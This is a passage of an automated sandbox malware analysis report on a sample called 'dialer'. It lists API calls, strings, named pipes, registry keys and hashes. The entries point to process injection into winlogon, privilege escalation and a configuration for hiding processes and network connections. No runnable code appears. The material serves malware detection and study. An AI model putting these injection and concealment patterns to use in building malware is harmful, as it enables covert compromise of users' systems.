                                                                            • Part of subcall function 00000001400014D8: RtlDeleteBoundaryDescriptor.NTDLL ref: 000000014000163D
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                                            • Part of subcall function 00000001400014D8: RtlRestoreThreadPreferredUILanguages.NTDLL ref: 0000000140001651
                                                                          • OpenProcess.KERNEL32 ref: 0000000140001859
                                                                          • TerminateProcess.KERNEL32 ref: 000000014000186C
                                                                          • CloseHandle.KERNEL32 ref: 0000000140001875
                                                                          • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Heap$AllocCloseEnumOpen$AllocateBoundaryChangeDeleteDescriptorFindHandleLanguagesMemoryModulesNotificationPreferredProcessesReadRestoreTerminateThread
                                                                          • String ID:
                                                                          • API String ID: 3158079169-0
                                                                          • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                          • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                                          • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                          • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandleModuleProtectVirtual$ChangeCurrentFindFreeInformationLibraryMappingNotificationProcessViewlstrcmpi
                                                                          • String ID: .text$C:\Windows\System32\
                                                                          • API String ID: 1125510917-832442975
                                                                          • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                          • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                                          • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                          • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                          • String ID: M$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2203880229-3489460547
                                                                          • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                          • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                                          • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                          • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 128 1400021d0-1400021da 129 1400021dd-1400021f0 call 140001b54 128->129 132 1400021f2-1400021fb Sleep 129->132 133 1400021fd-14000220a ConnectNamedPipe 129->133 132->129 134 140002241-140002246 Sleep 133->134 135 14000220c-14000222d ReadFile 133->135 136 14000224c-140002255 DisconnectNamedPipe 134->136 135->136 137 14000222f-140002234 135->137 136->133 137->136 138 140002236-14000223f 137->138 138->136
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                          • String ID: \\.\pipe\dialercontrol_redirect64
                                                                          • API String ID: 2071455217-3440882674
                                                                          • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                          • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                                          • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                          • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 148 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 149 140002b8e-140002ba1 K32EnumProcesses 148->149 150 140002ba3-140002bb2 149->150 151 140002beb-140002bf4 Sleep 149->151 152 140002bb4-140002bb8 150->152 153 140002bdc-140002be7 150->153 151->149 154 140002bba 152->154 155 140002bcb-140002bce call 140002540 152->155 153->151 156 140002bbe-140002bc3 154->156 159 140002bd2 155->159 157 140002bc5-140002bc9 156->157 158 140002bd6-140002bda 156->158 157->155 157->156 158->152 158->153 159->158
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                          • String ID:
                                                                          • API String ID: 3676546796-0
                                                                          • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                          • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                                          • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                          • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 172 1400018ac-1400018d6 OpenProcess 173 140001901-140001912 172->173 174 1400018d8-1400018e8 IsWow64Process 172->174 175 1400018f8-1400018fb FindCloseChangeNotification 174->175 176 1400018ea-1400018f3 174->176 175->173 176->175
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$ChangeCloseFindNotificationOpenWow64
                                                                          • String ID:
                                                                          • API String ID: 3805842350-0
                                                                          • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                          • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                                          • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                          • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 177 140002258-14000225c call 14000226c 179 140002261-140002263 ExitProcess 177->179
                                                                          APIs
                                                                            • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                                            • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                                            • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                                            • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                                            • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                                            • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                                            • Part of subcall function 000000014000226C: FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                                            • Part of subcall function 000000014000226C: FindResourceA.KERNEL32 ref: 000000014000232F
                                                                            • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                                            • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                                            • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                                            • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                                            • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                                            • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                                            • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                                            • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                                          • ExitProcess.KERNEL32 ref: 0000000140002263
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Resource$Security$CurrentDescriptorFindOpenToken$AdjustChangeCloseConvertCreateErrorExitFreeLastLoadLocalLockLookupNotificationPrivilegePrivilegesSizeofStringValue
                                                                          • String ID:
                                                                          • API String ID: 2373407002-0
                                                                          • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                          • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                                          • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                          • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Open$File$CloseExitFindHeapName$AllocChangeDeleteEnumHandleInformationModuleNotificationPathProcessesQueryReadTokenValueWow64lstrlen
                                                                          • String ID: SOFTWARE$dialerstager$open
                                                                          • API String ID: 4281403370-3931493855
                                                                          • Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                                          • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                                          • Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                                          • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                                          • String ID: @
                                                                          • API String ID: 3462610200-2766056989
                                                                          • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                          • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                                          • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                          • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                          • String ID: dialersvc64
                                                                          • API String ID: 4184240511-3881820561
                                                                          • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                          • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                                          • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                          • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Delete$CloseEnumOpen
                                                                          • String ID: SOFTWARE\dialerconfig
                                                                          • API String ID: 3013565938-461861421
                                                                          • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                          • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                                          • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                          • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: File$Write$CloseCreateHandle
                                                                          • String ID: \\.\pipe\dialercontrol_redirect64
                                                                          • API String ID: 148219782-3440882674
                                                                          • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                          • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                                          • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                          • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: ntdll.dll
                                                                          • API String ID: 1646373207-2227199552
                                                                          • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                          • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                                          • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                          • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                                          Execution Graph

                                                                          Execution Coverage:1.3%
                                                                          Dynamic/Decrypted Code Coverage:94.4%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:107
                                                                          Total number of Limit Nodes:16

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                          • API String ID: 106492572-2879589442
                                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction ID: 21d86d412d1650ae27b0043b2d401094e46d8c624b6cd0b43ec9435d42789ffa
                                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction Fuzzy Hash: 2D710A36321A91C6EB10AF66E8916EDB3A5FF84B98F401132DE4E57B69EF38C454C740

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                          • String ID: wr
                                                                          • API String ID: 1092925422-2678910430
                                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction ID: d234e4461be7ce666b4697da3425b0a366aa51e2e4cc7be98c343ce9cae75724
                                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction Fuzzy Hash: 05115B36724BC1C2EF159B22E4086ADB2A1FB88B85F44003ADE8E07794EF3DC505CB04

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$Current$Context
                                                                          • String ID:
                                                                          • API String ID: 1666949209-0
                                                                          • Opcode ID: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                                          • Instruction ID: a4617b46cd32b3a0414ab7f2d2c5e1ab313b6a71b2cba704dad36ec99b28e09a
                                                                          • Opcode Fuzzy Hash: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                                          • Instruction Fuzzy Hash: 9DD17776214B89C6DB709B56E49439EB7A0FB88B84F500126EE8D47BA9DF3CC545CF40

                                                                          Control-flow Graph

                                                                          • Control-flow graph of function 1e8589850d0 (APIs on its paths: GetCurrentThreadId, VirtualProtect, GetLastError)
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                                          • Instruction ID: fa7807662b3792369c97fc6f37bebb2b001074cd7c6065ce50333d33d1213250
                                                                          • Opcode Fuzzy Hash: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                                          • Instruction Fuzzy Hash: 11029436229BC5C6EB60CB59E49079EB7A1F785794F104026EA8E87BA9DF7CC454CF00

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$AllocQuery
                                                                          • String ID:
                                                                          • API String ID: 31662377-0
                                                                          • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                          • Instruction ID: 5ad133b89d074dd97bec0c1f73fb02c24c1f243091b434175b3c7d6c02ead25a
                                                                          • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                          • Instruction Fuzzy Hash: E531EC32239AC5C1EA70DA15E85539EF6A4FB88784F500536EACE46BA8DF7DC5809F04

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                          • String ID:
                                                                          • API String ID: 1683269324-0
                                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction ID: 9367effade6da1e612e9811c82477e14b03a08a888ac1948d4cbee7ffa7af72d
                                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction Fuzzy Hash: F41152716346C2C2FB60AB62F8493DDF294BF54385F90413FAD4E82995EF7CC0849A10

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600305289.000001E858980000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858980000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 3733156554-0
                                                                          • Opcode ID: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                                          • Instruction ID: 5a9e8cf37d9f90f00b28642c3c3ed99c7679eb8f6b8d0d5ae9ec7e4d6c0d13b2
                                                                          • Opcode Fuzzy Hash: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                                          • Instruction Fuzzy Hash: DFF01D76228B85C1D630DB51E44038EBBA0FB887D4F140122BE8D43B69CE3CC5808F00

                                                                          Control-flow Graph

                                                                          • Control-flow graph of function 1e85895273c (APIs on its paths: VirtualAlloc, LoadLibraryA)
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000016.00000002.3600075883.000001E858950000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_22_2_1e858950000_winlogon.jbxd
                                                                          Similarity
                                                                          • API ID: AllocLibraryLoadVirtual
                                                                          • String ID:
                                                                          • API String ID: 3550616410-0
                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction ID: 664efa2306450b3d651c980b7901db96b5cccce9d6076fff7dea8f6b8d110b4a
                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
